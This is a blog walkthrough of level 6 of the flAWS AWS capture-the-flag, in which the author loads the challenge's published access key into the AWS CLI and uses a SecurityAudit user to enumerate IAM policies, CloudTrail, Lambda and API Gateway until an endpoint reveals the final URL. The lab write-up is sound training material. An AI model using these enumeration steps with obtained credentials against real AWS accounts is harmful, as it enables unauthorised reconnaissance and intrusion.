flAWS – AWS CTF – Level 6

Level 6 – Challenge statement:

For this final challenge, you’re getting a user access key that has the SecurityAudit policy attached to it. See what else it can do and what else you might find in this AWS account.


Secret: S2IpymMBlViDlqcAnFuZfkVjXrYxZYhP+dZ4ps+u



flaws.cloud itself says it best:

Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). 
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.

A series of hints are provided that will teach you how to discover the info you'll need. 
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. 
At the start of each level you'll learn how to avoid the problem the previous level exhibited.

Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud. 

My approach:

This time we start with purportedly valid creds, so it seems we need to try a look for some misconfigurations to exploit.

First lets load the creds for use in the AWS CLI

        $ aws configure --profile flawslevel6          
        AWS Access Key ID [None]: AKIAJFQ6E7BY57Q3OBGA
        AWS Secret Access Key [None]: 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
        Default region name [None]: us-west-2
        Default output format [None]:

The AWS documentation states the following as it related to the SecurityAudit managed policy:

        Security Auditor
        AWS managed policy name: SecurityAudit

        Use case: This user monitors accounts for compliance with security requirements. This user can access logs and                 events to investigate potential security breaches or potential malicious activity.

        Policy description: This policy grants permissions to view configuration data for many AWS services and to review               their logs.

Interesting, I noticed a S3 bucket called flaws-log earlier, lets see:

        aws s3 ls s3://flaws-logs --profile flawslevel6
        An error occurred (AccessDenied) when calling the ListObjects operation: Access Denied

Ok, not that easy.

Other AWS services that this policy is likely related to would be CloudTrail and CloudWatch…

        aws cloudtrail describe-trails --profile flawslevel6
        "trailList": [      
          "IncludeGlobalServiceEvents": true,
          "Name": "cloudtrail",
          "S3KeyPrefix": "cloudtrail",
          "TrailARN": "arn:aws:cloudtrail:us-west-2:975426262029:trail/cloudtrail",
          "LogFileValidationEnabled": true,
          "IsMultiRegionTrail": true,
          "HasCustomEventSelectors": false,
          "S3BucketName": "flaws-logs",
          "HomeRegion": "us-west-2"

Indeed CouldTrail is ON, with the trail name of cloudtrail and pushing files with the cloudtrail prefix to the flaws-logs bucket.

Lets see if we can list the CloudTrail events:

        ~$ aws cloudtrail lookup-events --profile flawslevel6                                                                                                                                           
        An error occurred (AccessDeniedException) when calling the LookupEvents operation: User: arn:aws:iam::975426262029:user/Level6 is not authorized to perform: cloudtrail:LookupEvents


Lets learn more about this user:

  $ aws --profile flawslevel6 iam get-user
        "User": {                                                                                                            
        "UserName": "Level6",                                                                                             
        "Path": "/",                                                                                                       
        "CreateDate": "2017-02-26T23:11:16Z",                                                                               
        "Arn": "arn:aws:iam::975426262029:user/Level6"

And their attached policies:

        $ aws --profile flawslevel6 iam list-attached-user-policies --user-name Level6
            "AttachedPolicies": [
                    "PolicyName": "list_apigateways",
                    "PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways"
                    "PolicyName": "SecurityAudit",
                    "PolicyArn": "arn:aws:iam::aws:policy/SecurityAudit"

Oh!, this user is also attached to the list_apigateways policy.

Lets learn more about this policy:

        aws --profile flawslevel6 iam get-policy  --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
            "Policy": {
                "PolicyName": "list_apigateways",
                "Description": "List apigateways",
                "CreateDate": "2017-02-20T01:45:17Z",
                "AttachmentCount": 1,
                "IsAttachable": true,
                "PolicyId": "ANPAIRLWTQMGKCSPGTAIO",
                "DefaultVersionId": "v4",
                "Path": "/",
                "Arn": "arn:aws:iam::975426262029:policy/list_apigateways",
                "UpdateDate": "2017-02-20T01:48:17Z"

Now that we have the ARN and the version id – we can get the meat of this policy:

        $ aws --profile flawslevel6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
            "PolicyVersion": {
                "CreateDate": "2017-02-20T01:48:17Z",
                "VersionId": "v4",
                "Document": {
                    "Version": "2012-10-17",
                    "Statement": [
                            "Action": [
                            "Resource": "arn:aws:apigateway:us-west-2::/restapis/*",
                            "Effect": "Allow"
                "IsDefaultVersion": true

Now we know that this user is allowed to use the action GET with the resource arn:aws:apigateway:us-west-2::/restapis/*

API Gateway is typically used in conjunction with Lambda functions, lets see if we can see any:

        $ aws --region us-west-2 --profile flawslevel6 lambda list-functions
            "Functions": [
                    "TracingConfig": {
                        "Mode": "PassThrough"
                    "Version": "$LATEST",
                    "CodeSha256": "2iEjBytFbH91PXEMO5R/B9DqOgZ7OG/lqoBNZh5JyFw=",
                    "FunctionName": "Level6",
                    "MemorySize": 128,
                    "CodeSize": 282,
                    "FunctionArn": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
                    "Handler": "lambda_function.lambda_handler",
                    "Role": "arn:aws:iam::975426262029:role/service-role/Level6",
                    "Timeout": 3,
                    "LastModified": "2017-02-27T00:24:36.054+0000",
                    "Runtime": "python2.7",
                    "Description": "A starter AWS Lambda function."

There is one! Called Level6 – lets look into the policy:

        aws --region us-west-2 --profile flawslevel6 lambda get-policy --function-name Level6
            "Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"904610a93f593b76ad66ed6ed82c0a8b\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"apigateway.amazonaws.com\"},\"Action\":\"lambda:InvokeFunction\",\"Resource\":\"arn:aws:lambda:us-west-2:975426262029:function:Level6\",\"Condition\":{\"ArnLike\":{\"AWS:SourceArn\":\"arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\"}}}]}"

Interesting info, we can executearn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\ and s33ppypa75 is a rest-api-id

To get the full path we’ll need the stage name:

        aws --profile flawslevel6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
            "item": [
                    "stageName": "Prod",
                    "cacheClusterEnabled": false,
                    "cacheClusterStatus": "NOT_AVAILABLE",
                    "deploymentId": "8gppiv",
                    "lastUpdatedDate": 1488155168,
                    "createdDate": 1488155168,
                    "methodSettings": {}

Stage name is: Prod

So we have all the pieces to complete the format: https://<rest-api-id&gt;.execute-api.<region>.amazonaws.com/<stage-name>/<lambda function>

Therefore, we can access the endpoint here: https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

If we browse there we get the following output:

        "Go to http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/"  


Level 6 complete.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s